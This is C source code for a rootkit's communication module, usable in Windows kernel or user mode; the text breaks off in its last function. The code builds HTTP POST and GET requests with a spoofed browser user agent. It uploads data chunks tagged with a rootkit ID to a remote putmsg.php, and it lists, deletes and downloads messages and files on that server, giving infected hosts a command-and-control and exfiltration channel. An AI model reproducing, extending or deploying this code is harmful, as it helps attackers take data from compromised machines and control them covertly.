/*
*	communication routines specifically tailored for rootkits usage (kernel/usermode)
*  -vx-
*/

#pragma warning( disable : 4995 )

#include <stdio.h>
#include <stdlib.h>

// for debugging
#define NO_URKCOMMUT_DBGMSG

#if (defined (WIN32) || defined (WINCE)) && !defined (_KERNELMODE)
	#include <winsock2.h>
	#include <time.h>
#else
    #include <w32_defs.h>
#endif

#include <dbg.h>

#if defined (WIN32)
	#undef snprintf
	#define snprintf _snprintf
#endif

// windows kernelmode only
#ifdef _KERNELMODE
	#include <ntifs.h>
	#include <kgenut.h>
	#include <kstrut.h>
	#define POOL_TAG 'mckr'
	PAGED_LOOKASIDE_LIST ls_trxhttp_small; /// lookaside for small messages
#endif // ifdef _KERNELMODE

#include <strlib.h>
#include <mathut.h>
#include <gensock.h>
#include "rkcommut.h"

#define MSG_TAG "<myfile>"	/// tag appended to messages names in lists generated by getmsglist.php
#define MSG_TAG_SIZE 8
#define COMM_MEM_SMALL_SIZE 1024 /// for sockets string buffers

#ifdef DBG
#ifdef NO_URKCOMMUT_DBGMSG
#undef DBG_OUT
#undef WDBG_OUT
#define DBG_OUT(__x__)  
#define WDBG_OUT(__x__)
#endif
#endif

/*
*	this function should be used instead of freeing directly when the code is used in a DLL statically linked with the CRT on windows (usermode only)
*
*/
void rkcomm_free_buffer (IN void* buffer)
{
#ifndef _KERNELMODE
	if (buffer)
		free (buffer);
#endif
	return;
}

/*
 *	get http response without knowing length (can happen in http 1.0 requests)
 *
 */
int rkcomm_http_get_response_unknown_size (IN ksocket* sock, OUT unsigned char** response, OUT unsigned long* responselen)
{
	NTSTATUS Status = -1;
	unsigned long received = 0;
	unsigned char* buffer = NULL;
	unsigned long totalreceived = 0;
	unsigned long available = 0;
	unsigned char* p = NULL;

	if (!sock || !response || !responselen)
		return -1;
	*responselen = 0;
	*response = NULL;

	/// allocate memory for response buffer (unknown size)
#ifdef _KERNELMODE
	buffer = KRealloc(PagedPool,NULL,0,64*1024);
#else
	buffer = realloc (NULL,64*1024);
#endif // #ifdef _KERNELMODE
	if (!buffer)
		return -1;
	memset (buffer,0,64*1024);
	available = 64*1024;

	Status = STATUS_SUCCESS;
	while (TRUE)
	{
		received = 0;
		Status = KSocketsReceive(sock, buffer + totalreceived,available,&received);
		if (!NT_SUCCESS (Status) || received == 0)
			break;

		totalreceived += received;
		available -= received;
		if (available < 4*1024) // the buffer is about to be filled and must grow
		{
#ifdef _KERNELMODE
			p = KRealloc(PagedPool,buffer,totalreceived,totalreceived + 4*1024);
#else
			p = realloc (buffer,totalreceived + 4*1024);
#endif // #ifdef _KERNELMODE
			if (p)
			{
				buffer = p;
			}
			else
			{
				Status = -1;
				break;
			}
			available += 4*1024;
		}
	}
	
	// set error
	if (totalreceived == 0)
	{
		if (NT_SUCCESS (Status))
			Status = 0;
		else
			Status = -1;
	}
	else
	{
		*(buffer + totalreceived) = '\0';
		Status = STATUS_SUCCESS;
	}

	if (Status != 0)
	{
		if (buffer)
#ifdef _KERNELMODE
			ExFreePool(buffer);
#else
			free (buffer);
#endif // #ifdef _KERNELMODE
		buffer = NULL;
		totalreceived = 0;
	}

	*response = buffer;
	*responselen = totalreceived;
	return (int)Status;
}

/*
*	get http response (supports chunked / nonchunked). response must be freed by the caller
*  
*/
int rkcomm_http_get_response (IN ksocket* sock, OUT unsigned char** response, OUT unsigned long* responselen)
{
	char* line = NULL;
	unsigned char* tag = NULL;
	unsigned char* tag2 = NULL;
	unsigned long offset = 0;
	unsigned long currentsize = 0;
	NTSTATUS Status = -1;
	char* stopstring = NULL;
	unsigned long chunksize = 0;
	unsigned long totalsize = 0;
	int chunked = FALSE;
	unsigned long transferred = 0;
	unsigned char* buffer = NULL;
	unsigned char* p = NULL;

	/// check params
	if (!sock || !responselen || !response)
		return -1;

	*response = NULL;
	*responselen = 0;

	/// allocate memory for reading header lines
#ifdef _KERNELMODE
		line = ExAllocateFromPagedLookasideList(&ls_trxhttp_small);
#else
		line = calloc (1,COMM_MEM_SMALL_SIZE);
#endif // #ifdef _KERNELMODE

		if (!line)
			return -1;
	
	/// check ok
	Status = KSocketsReadLn (sock,line,COMM_MEM_SMALL_SIZE,&transferred);
	DBG_OUT (("urkcomm_http_get_response response: %s\n",line));
	
	if (!NT_SUCCESS (Status))
		goto __exit;
	if (!find_buffer_in_buffer (line,"200 OK", (unsigned long)strlen (line), (unsigned long)strlen ("200 OK"), FALSE))
	{
		Status = -1;
		goto __exit;
	}

	/// parse header until start of content
	while (TRUE)
	{
		// read line
		Status = KSocketsReadLn (sock,line,COMM_MEM_SMALL_SIZE,&transferred);
		if (!NT_SUCCESS (Status))
			break;

		// have we reached content ?
		if (*line == '\r' || *line == '\n')
		{
			// end reached
			Status = STATUS_SUCCESS;
			break;
		}

		// check for content-length tag
		tag = find_buffer_in_buffer(line,"CONTENT-LENGTH", (unsigned long)strlen (line), 14,FALSE);
		if (tag)
		{
			// get response length
			tag+=14;
			while (*tag != ':')
				tag++;
			tag++;
			while (*tag == ' ')
				tag++;
#ifdef _KERNELMODE
			totalsize = KAtol(tag);
#else
			totalsize = (unsigned long)atol((char*)tag);
#endif // #ifdef _KERNELMODE
			if (totalsize == 0)
			{
				/// 0size response, return ok
				Status = 0;
				goto __exit;
			}
			continue;
		}

		// check for transfer encoding tag
		tag2 = find_buffer_in_buffer (line,"TRANSFER-ENCODING:",(unsigned long)strlen(line),18,FALSE);		
		if (tag2)
		{
			// is it chunked ?
			if (find_buffer_in_buffer (line,"CHUNKED",(unsigned long)strlen(line),7,FALSE))
			{
				chunked = TRUE;
			}
			continue;
		}
	}

	/// check for error
	if (!NT_SUCCESS (Status))
		goto __exit;
	
	// check for http1.0 request (size unknown, not chunked)
	if (totalsize == 0 && !chunked)
	{
		// old style http request, process in a separate function
		Status = rkcomm_http_get_response_unknown_size(sock, &buffer, &totalsize);
		goto __exit;
	}

	if (!chunked)
	{
#ifdef _KERNELMODE
			buffer = ExAllocatePoolWithTag(PagedPool,totalsize + 1024,POOL_TAG);
			if (buffer)
				memset (buffer,0,totalsize + 1024);
#else
			buffer = calloc(1,totalsize + 1024);
#endif // #ifdef _KERNELMODE
		if (!buffer)
		{
			Status = -1;
			goto __exit;
		}

		offset = 0;
		currentsize = 0;
		while (currentsize != totalsize)		
		{
			/// read in a loop since socket couldn't return the whole buffer....
			Status = KSocketsReceive (sock,buffer+offset,totalsize-offset, &transferred);
			if (!NT_SUCCESS (Status))
			{
				Status = -1;
				break;
			}

			// advance pointer
			currentsize += transferred;
			offset += transferred;
		}

		// check error
		if (currentsize != totalsize)
			Status = -1;
	} // end nonchunked	
	else 
	{
		// read chunks
		totalsize = 0;
		offset = 0;
		while (TRUE)
		{
			/// read chunk size
			Status = KSocketsReadLn (sock,line,COMM_MEM_SMALL_SIZE,&transferred);
			if (!NT_SUCCESS (Status))
				break;
#ifdef _KERNELMODE
			chunksize = KStrtol (line,&stopstring,16);
#else
			chunksize = strtol (line,&stopstring,16);
#endif // #ifdef _KERNELMODE
			if (chunksize == 0)
			{
				// 0 size, finish
				*(buffer + totalsize) = '\0';
				Status = STATUS_SUCCESS;
				break;
			}

			/// allocate memory for chunk
#ifdef _KERNELMODE
			p = KRealloc (PagedPool,buffer,totalsize,totalsize+chunksize+1024);
#else
			p = realloc (buffer,totalsize+chunksize+1024);
#endif // #ifdef _KERNELMODE
			if (p)
			{
				buffer = p;
			}
			else
			{
				Status = -1;
				break;
			}

			/// read chunk content
			currentsize = 0;
			while (currentsize != chunksize)
			{
				Status = KSocketsReceive (sock,buffer + offset, chunksize-currentsize, &transferred);
				if (!NT_SUCCESS (Status))
					break;

				/// advance pointer
				currentsize += transferred;
				offset += transferred;
				totalsize += transferred;
			} 
			// check error
			if (!NT_SUCCESS (Status))
				break;

			// get past chunk boundary
			Status = KSocketsReadLn (sock,line,COMM_MEM_SMALL_SIZE,&transferred);
			if (!NT_SUCCESS (Status))
				break;

		} // chunked  while .... TRUE
	} // end chunked

__exit:
	if (line)
#ifdef _KERNELMODE
		ExFreeToPagedLookasideList(&ls_trxhttp_small,line);
#else
		free(line);
#endif // #ifdef _KERNELMODE

	/// check result and free result memory on error
	if (!NT_SUCCESS (Status))
	{
		Status = -1;
		
		if (buffer)
#ifdef _KERNELMODE
			ExFreePool (buffer);
#else
			free (buffer);
#endif // #ifdef _KERNELMODE
	}	
	else
	{
		/// return response
		*response = buffer;
		*responselen = totalsize;
	}

	return (int)Status;
}

/*
*	build POST request header for http send
*
*/
int rkcomm_http_build_postreq (IN char* serverhostname, IN char* serverpath, IN char* target, IN char* datatype, IN char* boundary, IN unsigned char* postdata, IN unsigned long datasize, IN OUT unsigned char** requestbuffer, OUT unsigned long* requestsize, IN int multipart)
{
	char* pBuffer = NULL;
	NTSTATUS Status = -1;
	unsigned char* pTmp = NULL;
	unsigned long returnsize = 0;
	unsigned long size = 0;

	/// check params
	if (!serverhostname || !serverpath || !target || !datatype || !boundary || !postdata || !requestbuffer || !datasize || !requestsize)
		return -1;

	*requestbuffer = NULL;
	*requestsize = 0;
	if (multipart)
		size = datasize + 4;
	else 
		size = datasize;

	/// allocate memory
#ifdef _KERNELMODE
	pBuffer = ExAllocatePoolWithTag (PagedPool, 1024 + datasize,POOL_TAG);
	if (pBuffer)
		memset (pBuffer,0,1024 + datasize);
#else
	pBuffer = calloc (1,1024 + datasize);
#endif // #ifdef _KERNELMODE
	if (!pBuffer)
	{
		Status = -1;
		goto __exit;
	}

	/// build req
	if (multipart)
	{
		sprintf(pBuffer,
			"POST %s/%s HTTP/1.1\r\n"
			"Host: %s\r\n"
			"User-Agent: Mozilla/5.0\r\n"
			"Connection: Close\r\n"
			"Content-Type: %s; boundary=%s\r\n"
			"Content-Length: %d\r\n\r\n",
			serverpath, target, serverhostname, datatype, boundary, size);
	}
	else
	{
		sprintf(pBuffer,
			"POST %s/%s HTTP/1.1\r\n"
			"Host: %s\r\n"
			"User-Agent: Mozilla/5.0\r\n"
			"Connection: Close\r\n"
			"Content-Type: %s\r\n"
			"Content-Length: %d\r\n\r\n",
			serverpath, target, serverhostname, datatype, size);
	}

	DBG_OUT (("urkcomm_http_build_postreq request : %s\n",pBuffer));	

	/// compute full request size
	returnsize = (unsigned long)strlen (pBuffer) + datasize;

	/// append post data
	pTmp = (unsigned char*)pBuffer + strlen (pBuffer);
	memcpy (pTmp, postdata, datasize);

	if(multipart)
	{
		memcpy(pTmp + datasize, "\r\n\r\n", 4);
		returnsize += 4;
	}

	/// done
	*requestsize = returnsize;
	*requestbuffer = (unsigned char*)pBuffer;

	Status = STATUS_SUCCESS;

__exit:
	return (int)Status;
}

/*
*	build multipart header for http send
*
*/
int rkcomm_http_build_multipart (IN char* destinationdir, OPTIONAL IN unsigned long rkuid, OPTIONAL IN PLARGE_INTEGER time, OPTIONAL int numchunk, OPTIONAL IN char* filename, IN unsigned char* data, IN unsigned long datasize, IN char* boundary, IN OUT unsigned char** mimehdr, OUT unsigned long* mimehdrsize)
{
	NTSTATUS Status = -1;
	unsigned char*	hdr = NULL;
	int	headerlen = 0;
	unsigned long offset = 0;
	char msgname [1024] = {0};
	int sizealloc = 1024 + datasize + 1;

	/// check params
	if (!destinationdir || !data || !mimehdr || !datasize || !boundary || !mimehdrsize)
		return -1;
	if (!filename && !time)
		return -1;

	*mimehdr = NULL;
	*mimehdrsize = 0;

	/// allocate header memory
#ifdef _KERNELMODE
	hdr = ExAllocatePoolWithTag (PagedPool, sizealloc, POOL_TAG);
	if (hdr)
		memset (hdr,0,sizealloc);
#else
	hdr = calloc (1, sizealloc);
#endif // #ifdef _KERNELMODE
	if (!hdr)
		return -1;

	/// build header, start appending boundary (preceed with '--');
	strcpy ((char*)hdr,"--");
	strcat ((char*)hdr,boundary);
	strcat ((char*)hdr,"\r\n");

	/// build filename
	if (!filename)
		sprintf (msgname,"%08x-%08x%08x_%d.dat",rkuid,time->HighPart,time->LowPart,numchunk);
	else
		snprintf (msgname,1024,filename);

	/// append content disposition for file data
	strcat ((char*)hdr, "Content-Disposition: form-data; name=\"file\"; filename=\"");
	strcat ((char*)hdr, msgname);
	strcat ((char*)hdr, "\"\r\n");
	strcat ((char*)hdr, "Content-Type: application/octet-stream\r\n\r\n");
	headerlen += (int)strlen ((char*)hdr);

	DBG_OUT (("urkcomm_http_build_multipart header : %s\n",hdr));

	/// copy data
	offset = headerlen;
	memcpy (hdr + offset, data, datasize);
	offset += datasize;
	memcpy (hdr + offset,"\r\n",2);
	offset += 2;
	headerlen += (datasize + 2);

	/// append boundary and content disposition for path
	strcpy ((char*)hdr + offset,"--");
	strcat ((char*)hdr + offset,boundary);
	strcat ((char*)hdr + offset,"\r\n");
	strcat ((char*)hdr + offset, "Content-Disposition: form-data; name=\"Path\"\r\n\r\n");
	strcat ((char*)hdr + offset, destinationdir);
	strcat ((char*)hdr + offset, "/\r\n");

	/// end boundary and end post
	strcat ((char*)hdr + offset,"--");
	strcat ((char*)hdr + offset, boundary);
	strcat ((char*)hdr + offset, "--");
	headerlen += (int)strlen ((char*)hdr + offset);

	/// return results
	*mimehdrsize = headerlen;
	*mimehdr = hdr;
	Status = STATUS_SUCCESS;

	return (int)Status;
}

/*
*	send buffer to a connected socket
*
*/
int rkcomm_send (IN ksocket* sock, IN unsigned char* buffer, IN unsigned long size)
{
	unsigned long offset  = 0;
	unsigned long reqsize = size;
	unsigned long sizetosend = 0;
	unsigned long transferred = 0;
	NTSTATUS Status = -1;

	/// send loop
	offset = 0;
	while (TRUE)
	{
		if (reqsize < 1024)	
			sizetosend = reqsize;
		else
			sizetosend = 1024;

		/// send data
		Status = KSocketsSend(sock, buffer + offset, sizetosend, &transferred);
		if (!NT_SUCCESS(Status))
		{
			Status = -1;
			break;
		}

		/// next
		reqsize-=sizetosend;
		offset+=sizetosend;
		if (!reqsize)
			break;
	}

	return (int)Status;
}

/*
*	POST buffer to php script on server via http (internal use). ip and port must be nbo. destination dir must begin with / (eg. /out)
*
*/
int rkcomm_http_php_post_internal (IN unsigned long ip, IN unsigned short port, IN char* serverhostname, IN char* serverpath, IN char* destinationdir, OPTIONAL IN unsigned long rkuid, OPTIONAL IN char* filename, OPTIONAL IN PLARGE_INTEGER reqtime, IN char* boundarytag, OPTIONAL IN int numchunk, IN unsigned char* buffer, IN unsigned long size)
{
	NTSTATUS Status = -1;
	unsigned char* postdata = NULL;
	unsigned long postdatasize = 0;
	unsigned char* request = NULL;
	unsigned long reqsize = 0;
	char* line = NULL;
	ksocket* sock = NULL;
	unsigned long transferred = 0;

	if (!serverhostname || !serverpath || !ip || !port || !buffer || !size || !boundarytag || !destinationdir)
		return -1;
	if (!filename && !reqtime)
		return -1;

	/// build upload header
	Status = rkcomm_http_build_multipart(destinationdir, rkuid, reqtime, numchunk, filename, buffer, size, boundarytag, &postdata, &postdatasize);
	if (Status != 0)
		goto __exit;

	/// build post request on putmsg.php
	Status = rkcomm_http_build_postreq (serverhostname, serverpath, "putmsg.php", "multipart/form-data", boundarytag, postdata, postdatasize, &request, &reqsize, TRUE);
	if (Status != 0)
		goto __exit;

	/// create and connect socket
	Status = KSocketsCreate (&sock);
	if (!NT_SUCCESS(Status))
		goto __exit;
	Status = KSocketsConnect(sock,ip,port);
	if (!NT_SUCCESS(Status))
	{	
		Status = TRX_ERROR;
		goto __exit;
	}

	/// send request
	Status = rkcomm_send(sock,request,reqsize);
	if (Status != 0)
		goto __exit;

	/// check response
#ifdef _KERNELMODE
	line = ExAllocateFromPagedLookasideList(&ls_trxhttp_small);
#else
	line = calloc(1,COMM_MEM_SMALL_SIZE);
#endif // #ifdef _KERNELMODE

	if (!line)
	{
		Status = -1;
		goto __exit;
	}

	/// read response from socket
	Status = KSocketsReadLn (sock,line,COMM_MEM_SMALL_SIZE,&transferred);
	DBG_OUT (("krkcomm_php_post_internal response : %s\n",line));
	if (!NT_SUCCESS (Status))
		goto __exit;
	if (!find_buffer_in_buffer(line,"200 OK", (unsigned long)strlen (line), (unsigned long)strlen ("200 OK"), FALSE))
	{
		Status = -1;
		goto __exit;
	}

__exit:
	if (!NT_SUCCESS (Status))
		Status = -1;

	if (sock)
	{
		KSocketsDisconnect (sock);
		KSocketsClose (sock);
	}

#ifdef _KERNELMODE
	if (line)
		ExFreeToPagedLookasideList(&ls_trxhttp_small,line);
	if (postdata)
		ExFreePool (postdata);
	if (request)
		ExFreePool (request);
#else
	if (line)
		free (line);
	if (postdata)
		free (postdata);
	if (request)
		free (request);	
#endif // #ifdef _KERNELMODE

	if (Status != 0)
		DBG_OUT (("krkcomm_php_post_internal returned error %x\n",Status));

	return (int)Status;
}

/*
*	POST buffer to php script on server via http, resulting in file upload. ip and port must be nbo. destination dir must begin with / (eg. /out)
*
*/
int rkcomm_http_php_post_file (IN unsigned long ip, IN unsigned short port, IN char* serverhostname, IN char* serverpath, IN char* destinationdir, OPTIONAL IN unsigned long rkuid, IN PLARGE_INTEGER reqtime, OPTIONAL IN int numchunk, IN unsigned char* buffer, IN unsigned long size)
{
	char boundarytag [64] = {0};
	
	if (!serverhostname || !serverpath || !ip || !port || !buffer || !size || !reqtime || !destinationdir)
		return -1;

	/// build boundary tag
#if defined _KERNELMODE
	{
		ULARGE_INTEGER now = {0};
		KeQuerySystemTime ((PLARGE_INTEGER)&now);
		ExSystemTimeToLocalTime ((PLARGE_INTEGER)&now,(PLARGE_INTEGER)&now);
		sprintf (boundarytag,"--%08x%08_%08x%08x",now.HighPart,now.LowPart,now.LowPart,now.HighPart);
	}
#endif // #if defined _KERNELMODE

#if !defined (WINCE) && !defined (_KERNELMODE)
	{
		time_t t;
		struct tm* newt = NULL;
		time (&t);
		newt = gmtime(&t);
		sprintf (boundarytag,"--%08x%08x_%08x%08x",newt->tm_wday, newt->tm_hour, newt->tm_min, newt->tm_sec);
	}
#endif // #if !defined (WINCE) && !defined (_KERNELMODE)

#if defined (WINCE) && (defined (WIN32))
	{
		SYSTEMTIME st = {0};
		GetLocalTime(&st);	
		sprintf (boundarytag,"--%08x%08x_%08x%08x",st.wDay, st.wHour, st.wMinute, st.wSecond);
	} 
#endif // #if defined (WINCE) && (defined (WIN32))

	/// call internal function
	return rkcomm_http_php_post_internal(ip,port,serverhostname,serverpath,destinationdir,rkuid,NULL,reqtime,boundarytag,numchunk,buffer,size);
}

/*
*	POST buffer to php script on server via http (providing filename), resulting in file upload. ip and port must be nbo. destination dir must begin with / (eg. /out)
*
*/
int rkcomm_http_php_post_file_with_name (IN unsigned long ip, IN unsigned short port, IN char* serverhostname, IN char* serverpath, IN char* destinationdir, IN char* filename, IN unsigned char* buffer, IN unsigned long size)
{
	char boundarytag [64] = {0};

	if (!serverhostname || !serverpath || !ip || !port || !buffer || !size || !filename)
		return -1;

	/// build boundary tag
#if defined _KERNELMODE
	{
		ULARGE_INTEGER now = {0};
		KeQuerySystemTime ((PLARGE_INTEGER)&now);
		ExSystemTimeToLocalTime ((PLARGE_INTEGER)&now,(PLARGE_INTEGER)&now);
		sprintf (boundarytag,"--%08x%08_%08x%08x",now.HighPart,now.LowPart,now.LowPart,now.HighPart);
	}
#endif // #if defined _KERNELMODE

#if !defined (WINCE) && !defined (_KERNELMODE)
	{
		time_t t;
		struct tm* newt = NULL;
		time (&t);
		newt = gmtime(&t);
		sprintf (boundarytag,"--%08x%08x_%08x%08x",newt->tm_wday, newt->tm_hour, newt->tm_min, newt->tm_sec);
	}
#endif // #if !defined (WINCE) && !defined (_KERNELMODE)

#if defined (WINCE) && (defined (WIN32))
	{
		SYSTEMTIME st = {0};
		GetLocalTime(&st);	
		sprintf (boundarytag,"--%08x%08x_%08x%08x",st.wDay, st.wHour, st.wMinute, st.wSecond);
	} 
#endif // #if defined (WINCE) && (defined (WIN32))

	/// call internal function
	return rkcomm_http_php_post_internal(ip,port,serverhostname,serverpath,destinationdir,0,filename,NULL,boundarytag,0,buffer,size);
}

/*
*	delete file on specified server via php. ip and port must be nbo
*  filename must begin with / (i.e./path/index.html)
*/
int rkcomm_http_php_delete_file  (IN unsigned long ip, IN unsigned short port, IN char* serverhostname, IN char* serverpath, IN char* filename)
{
	NTSTATUS Status = -1;
	char boundarytag [64] = {0};
	unsigned char* request = NULL;
	unsigned long reqsize = 0;
	char* line = NULL;
	ksocket* sock = NULL;
	unsigned char postdata [1024] = {0};
	unsigned long transferred = 0;

	if (!ip || !port || !serverhostname || !serverpath || !filename)
		return -1;

	/// build boundary tag
#if defined _KERNELMODE
	{
		ULARGE_INTEGER now = {0};
		KeQuerySystemTime ((PLARGE_INTEGER)&now);
		ExSystemTimeToLocalTime ((PLARGE_INTEGER)&now,(PLARGE_INTEGER)&now);
		sprintf (boundarytag,"--%08x%08_%08x%08x",now.HighPart,now.LowPart,now.LowPart,now.HighPart);
	}
#endif // #if defined _KERNELMODE

#if !defined (WINCE) && !defined (_KERNELMODE)
	{
		time_t t;
		struct tm* newt = NULL;
		time (&t);
		newt = gmtime(&t);
		sprintf (boundarytag,"--%08x%08x_%08x%08x",newt->tm_wday, newt->tm_hour, newt->tm_min, newt->tm_sec);
	}
#endif // #if !defined (WINCE) && !defined (_KERNELMODE)

#if defined (WINCE) && (defined (WIN32))
	{
		SYSTEMTIME st = {0};
		GetLocalTime(&st);	
		sprintf (boundarytag,"--%08x%08x_%08x%08x",st.wDay, st.wHour, st.wMinute, st.wSecond);
	} 
#endif // #if defined (WINCE) && (defined (WIN32))

	/// build post request on delmsg.php
	snprintf ((char*)postdata, 1024, "Testo=%s",filename);
	Status = rkcomm_http_build_postreq (serverhostname,serverpath, "delmsg.php", "application/x-www-form-urlencoded", boundarytag, postdata, (unsigned long)strlen((char*)postdata),
		&request, &reqsize, FALSE);
	if (Status != 0)
		goto __exit;

	/// create and connect socket
	Status = KSocketsCreate (&sock);
	if (!NT_SUCCESS(Status))
		goto __exit;

	Status = KSocketsConnect(sock,ip,port);
	if (!NT_SUCCESS(Status))
	{	
		Status = TRX_ERROR;
		goto __exit;
	}

	/// send request
	Status = rkcomm_send(sock,request,reqsize);
	if (Status != 0)
		goto __exit;

	/// check response
#ifdef _KERNELMODE
	line = ExAllocateFromPagedLookasideList(&ls_trxhttp_small);
#else
	line = calloc (1,COMM_MEM_SMALL_SIZE);
#endif // #ifdef _KERNELMODE
	if (!line)
	{
		Status = -1;
		goto __exit;
	}

	/// read response from socket
	Status = KSocketsReadLn (sock,line,COMM_MEM_SMALL_SIZE,&transferred);
	DBG_OUT (("urkcomm_http_php_delete_file response : %s\n",line));
	if (Status != 0)
		goto __exit;
	if (!find_buffer_in_buffer(line,"200 OK", (unsigned long)strlen (line), (unsigned long)strlen ("200 OK"), FALSE))
	{
		Status = -1;
		goto __exit;
	}

__exit:
	if (!NT_SUCCESS (Status))
		Status = -1;

	if (sock)
	{
		KSocketsDisconnect (sock);
		KSocketsClose (sock);
	}

#ifdef _KERNELMODE
	if (line)
		ExFreeToPagedLookasideList(&ls_trxhttp_small,line);
	if (request)
		ExFreePool (request);
#else
	if (line)
		free (line);
	if (request)
		free (request);
#endif // #ifdef _KERNELMODE

	if (Status != 0)
		DBG_OUT (("urkcomm_http_php_delete_file returned error %x\n",Status));
	return Status;
}

/*
*	returns number of messages in the specified folder (0 separated strings). msglist must be freed by the caller. ip and port must be nbo.
*	serverpath is the first part of the path (/reflector/nanomod), path is the last part (/out)
*/
int rkcomm_http_get_msg_list (IN unsigned long ip, IN unsigned short port, IN char* serverhostname, IN char* serverpath, IN char* path, OUT char** msglist, OUT int* nummsgs)
{
	NTSTATUS Status = -1;
	char boundarytag [64] = {0};
	unsigned char* request = NULL;
	unsigned long reqsize = 0;
	unsigned char* response = NULL;
	unsigned long responsesize = 0;
	ksocket* sock = NULL;
	unsigned char postdata [1024] = {0};
	unsigned long count = 0;
	char* messages = NULL;
	char* current = NULL;
	char* currentcopied = NULL;

	// check params
	if (!ip || !port || !serverhostname || !serverpath || !msglist || !nummsgs || !path)
		return -1;
	*nummsgs = 0;
	*msglist = NULL;

/// build boundary tag
#if defined _KERNELMODE
	{
		ULARGE_INTEGER now = {0};
		KeQuerySystemTime ((PLARGE_INTEGER)&now);
		ExSystemTimeToLocalTime ((PLARGE_INTEGER)&now,(PLARGE_INTEGER)&now);
		sprintf (boundarytag,"--%08x%08_%08x%08x",now.HighPart,now.LowPart,now.LowPart,now.HighPart);
	}
#endif // #if defined _KERNELMODE

#if !defined (WINCE) && !defined (_KERNELMODE)
	{
		time_t t;
		struct tm* newt = NULL;
		time (&t);
		newt = gmtime(&t);
		sprintf (boundarytag,"--%08x%08x_%08x%08x",newt->tm_wday, newt->tm_hour, newt->tm_min, newt->tm_sec);
	}
#endif // #if !defined (WINCE) && !defined (_KERNELMODE)

#if defined (WINCE) && (defined (WIN32))
	{
		SYSTEMTIME st = {0};
		GetLocalTime(&st);	
		sprintf (boundarytag,"--%08x%08x_%08x%08x",st.wDay, st.wHour, st.wMinute, st.wSecond);
	} 
#endif // #if defined (WINCE) && (defined (WIN32))
	
	/// build post request on getmsglist.php
	snprintf ((char*)postdata, 1024, "Testo=%s",path);
	Status = rkcomm_http_build_postreq (serverhostname, serverpath, "getmsglist.php", "application/x-www-form-urlencoded", boundarytag, postdata, (unsigned long)strlen((char*)postdata),
		&request, &reqsize, FALSE);
	if (Status != 0)
		goto __exit;

	/// create and connect socket
	Status = KSocketsCreate (&sock);
	if (!NT_SUCCESS (Status))
		goto __exit;
	Status = KSocketsConnect(sock,ip,port);
	if (!NT_SUCCESS (Status))
	{	
		Status = TRX_ERROR;
		goto __exit;
	}

	/// send request
	Status = rkcomm_send(sock,request,reqsize);
	if (Status != 0)
		goto __exit;

	/// get response
	Status = rkcomm_http_get_response(sock,&response,&responsesize);
	if (Status != 0)
		goto __exit;

	/// no messages ?
	if (!responsesize || !response)
	{
		Status = 0;
		goto __exit;
	}

	/// allocate memory for msglist and copy back results. Note that here we check for our msg tag, to avoid
	/// servers which embeds automatically scripts and shit in the responses.
#ifdef _KERNELMODE
	messages = ExAllocatePoolWithTag (PagedPool, responsesize + 1024,POOL_TAG);
	if (messages)
		memset (messages,0,responsesize+1024);
#else
	messages = calloc (1,responsesize + 1024);
#endif // #ifdef _KERNELMODE
	if (!messages)
	{
		Status = -1;
		goto __exit;
	}

	/// copy message names
	current = (char*)response;
	currentcopied=messages;
	while (TRUE)
	{
		/// search tag
		current = strstr (current,MSG_TAG);
		if (!current)
			break;
		count++;

		/// copy name
		current+=MSG_TAG_SIZE;
		while (TRUE)
		{
			if (*current == '\0')
				break;
			/// copy chars until endtag
			if (*current != '<')
			{
				*currentcopied = *current;
				current++;currentcopied++;
			}
			else
			{
				*currentcopied = '\0';
				current++;currentcopied++;
				break;
			}
		}
	}

	// ok
	*nummsgs = count;
	*msglist = messages;

__exit:
	if (!NT_SUCCESS (Status))
		Status = -1;
		
	/// if 0 messages, free messages memory
	if (count == 0)
	{
		if (messages)
		{
#ifdef _KERNELMODE
			ExFreePool (messages);
#else
			free (messages);
#endif // #ifdef _KERNELMODE

			*msglist = NULL;
		}
		*nummsgs = 0;
	}

	if (sock)
	{
		KSocketsDisconnect(sock);
		KSocketsClose(sock);
	}
	
	/// free mem
#ifdef _KERNELMODE
if (request)
		ExFreePool (request);
	if (response)
		ExFreePool (response);
#else
	if (request)
		free (request);
	if (response)
		free (response);
#endif // #ifdef _KERNELMODE
		
	DBG_OUT (("urkcomm_http_get_msg_list res=%d, nummsg=%d\n",Status,count));
	return (int)Status;
}

/*
*	build get request for the specified target (i.e. /index.html). request must be freed by the caller
*
*/
int rkcomm_http_build_getreq (IN char* serverhostname, IN char* serverpath, IN char* reqtarget, OUT char** request, OUT PULONG requestsize)
{
	char* buffer = NULL;
	int Status = -1;

	/// check params
	if (!serverhostname || !serverpath || !request || !requestsize || !reqtarget)
		return -1;
	*request = NULL;
	*requestsize = 0;

	/// allocate memory
#ifdef _KERNELMODE
	buffer = ExAllocatePoolWithTag (PagedPool,1024,POOL_TAG);
	if (buffer)
		memset (buffer,0,1024);
#else
	buffer = calloc (1,1024);
#endif // #ifdef _KERNELMODE
	if (!buffer)
		return -1;

	/// build GET request (no compression support)
	sprintf (buffer,
		"GET %s%s HTTP/1.1\r\n"
		"Host: %s\r\n"
		"Connection: Close\r\n"
		"\r\n\r\n",
		serverpath,reqtarget,serverhostname);

	Status = 0;
	*request = buffer;
	*requestsize = (ULONG)strlen (buffer);

	return (int)Status;
}

/*
*	get specified file from specified server. response must be freed by the caller. ip and port must be nbo.
*  filetoget must begin with / (i.e./path/index.html)
*/
int rkcomm_http_get_file_to_memory (IN unsigned long ip, IN unsigned short port, IN char* serverhostname, IN char* serverpath, IN char* filetoget, OUT unsigned char** response, OUT unsigned long* responsesize)
{
	char* request = NULL;
	unsigned long reqsize = 0;
	unsigned char* resp = NULL;
	unsigned long respsize = 0;
	ksocket* sock = NULL;
	int Status = -1;

	/// check params
	if (!serverhostname || !serverpath || !ip || !port || !filetoget || !responsesize || !response)
		return -1;
	*response = NULL;
	*responsesize = 0;

	/// build get request
	Status = rkcomm_http_build_getreq(serverhostname,serverpath,filetoget,&request,&reqsize);
	if (Status != 0)
		goto __exit;
	
	/// create socket
	Status = KSocketsCreate (&sock);
	if (!NT_SUCCESS (Status))
		goto __exit;

	/// connect socket
	Status = KSocketsConnect(sock,ip,port);
	if (!NT_SUCCESS(Status))
	{	
		Status = TRX_ERROR;
		goto __exit;
	}

	/// send request
	Status = rkcomm_send(sock,(unsigned char*)request,reqsize);
	if (Status != 0)
		goto __exit;

	/// get response
	Status = rkcomm_http_get_response(sock,&resp,&respsize);
	if (Status != 0)
		goto __exit;

	/// ok
	*response = resp;
	*responsesize = respsize;

__exit:
	if (!NT_SUCCESS (Status))
		Status = -1;
		
	if (sock)
	{
		KSocketsDisconnect (sock);
